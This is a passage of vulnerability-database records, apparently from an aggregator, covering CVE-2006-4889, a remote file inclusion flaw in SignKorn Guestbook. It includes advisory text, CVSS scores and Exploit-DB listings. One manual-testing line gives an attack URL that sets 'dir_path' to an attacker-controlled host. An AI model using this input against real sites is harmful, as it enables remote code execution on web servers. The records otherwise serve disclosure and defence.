"AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32215", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}, {"id": "OSVDB:32218", "type": "osvdb", "title": "SignKorn Guestbook admin/admin.php dir_path Variable Remote File Inclusion", "description": "## Vulnerability Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/admin.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nSignKorn Guestbook contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/admin.php script not properly sanitizing user input supplied to the 'dir_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[Script]/admin/admin.php?dir_path=[attacker]\n## References:\nVendor URL: http://www.telekorn.com/cms/front_content.php\nVendor Specific News/Changelog Entry: http://www.telekorn.com/forum/showthread.php?t=1427\n[Related OSVDB ID: 32202](https://vulners.com/osvdb/OSVDB:32202)\n[Related OSVDB ID: 32215](https://vulners.com/osvdb/OSVDB:32215)\n[Related OSVDB ID: 32217](https://vulners.com/osvdb/OSVDB:32217)\n[Related OSVDB ID: 32199](https://vulners.com/osvdb/OSVDB:32199)\n[Related OSVDB ID: 32201](https://vulners.com/osvdb/OSVDB:32201)\n[Related OSVDB ID: 32203](https://vulners.com/osvdb/OSVDB:32203)\n[Related OSVDB ID: 32209](https://vulners.com/osvdb/OSVDB:32209)\n[Related OSVDB ID: 32211](https://vulners.com/osvdb/OSVDB:32211)\n[Related OSVDB ID: 32213](https://vulners.com/osvdb/OSVDB:32213)\n[Related OSVDB ID: 32200](https://vulners.com/osvdb/OSVDB:32200)\n[Related OSVDB ID: 32206](https://vulners.com/osvdb/OSVDB:32206)\n[Related OSVDB ID: 32216](https://vulners.com/osvdb/OSVDB:32216)\n[Related OSVDB ID: 32204](https://vulners.com/osvdb/OSVDB:32204)\n[Related OSVDB ID: 32205](https://vulners.com/osvdb/OSVDB:32205)\n[Related OSVDB ID: 32207](https://vulners.com/osvdb/OSVDB:32207)\n[Related OSVDB ID: 32208](https://vulners.com/osvdb/OSVDB:32208)\n[Related OSVDB ID: 32210](https://vulners.com/osvdb/OSVDB:32210)\n[Related OSVDB ID: 32212](https://vulners.com/osvdb/OSVDB:32212)\n[Related OSVDB ID: 32214](https://vulners.com/osvdb/OSVDB:32214)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0249.html\nISS X-Force ID: 28888\n[CVE-2006-4889](https://vulners.com/cve/CVE-2006-4889)\nBugtraq ID: 19977\n", "published": "2006-09-13T13:23:17", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:32218", "cvelist": ["CVE-2006-4889"], "lastseen": "2017-04-28T13:20:28"}], "exploitdb": [{"id": "EDB-ID:28528", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x help/en/adminhelp0.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x help/en/adminhelp0.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28528/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:21:37"}, {"id": "EDB-ID:28523", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x includes/functions.gb.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x includes/functions.gb.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28523/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:20:58"}, {"id": "EDB-ID:28539", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x admin/index.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x admin/index.php dir_path Parameter Remote File Inclusion. CVE-2006-4889 . Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28539/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:23:08"}, {"id": "EDB-ID:28522", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x index.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x index.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28522/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:20:50"}, {"id": "EDB-ID:28538", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x admin/log.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x admin/log.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28538/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:23:00"}, {"id": "EDB-ID:28540", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x admin/config.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x admin/config.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28540/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:23:19"}, {"id": "EDB-ID:28541", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x admin/admin.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x admin/admin.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28541/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:23:28"}, {"id": "EDB-ID:28527", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x smile.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x smile.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28527/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:21:29"}, {"id": "EDB-ID:28536", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x entry.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x entry.php dir_path Parameter Remote File Inclusion. CVE-2006-4889 . Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28536/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:22:42"}, {"id": "EDB-ID:28537", "type": "exploitdb", "title": "Telekorn Signkorn Guestbook 1.x admin/preview.php dir_path Parameter Remote File Inclusion", "description": "Telekorn Signkorn Guestbook 1.x admin/preview.php dir_path Parameter Remote File Inclusion. CVE-2006-4889. Webapps exploit for php platform", "published": "2006-09-12T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28537/", "cvelist": ["CVE-2006-4889"], "lastseen": "2016-02-03T08:22:52"}]}}